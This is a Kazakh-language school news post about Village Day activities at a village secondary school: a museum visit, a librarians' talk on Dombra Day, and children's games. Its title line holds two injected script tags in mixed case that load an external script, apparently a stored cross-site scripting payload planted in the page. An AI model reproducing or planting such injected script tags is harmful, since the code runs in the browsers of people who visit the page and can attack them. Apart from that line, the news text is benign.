Ауыл күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
13.06.2019
Ғ. Әбдірахманұлы атындағы Қима орта мектебінде «Күншуақ» атты мектеп жанындағы демалыс орталығында «Ауыл күні» тақырыбында оқушылармен іс-шаралар өткізілді. Соның ішінде, атап айтсақ, мектеп мұражайына саяхат, ауылдық кітапханадан кітапханашылар келіп, домбыра күніне байланысты балаларға ақпарат ұсынды.
Мұражайға саяхат барысында оқушыларға мектебіміздің беделді ұстазы, соғыс ардагері - Ғұбайдолла Әбдірахманұлы жайында ақпарат айтылды. Сонымен қатар, мектебіміздің ұстаздары, оқушылары, қолөнер туындылары, т.б туралы танымдық мәліметтер ұсынылды.
Сонымен қоса, балалар түрлі түсті шарлармен сергіту сәтінде ойындар ойнады. Балалар жоғары белсенділік таныта, «Ауыл күнін» қызықты өткізді.
Домнаева М.Д.
Просмотров: 635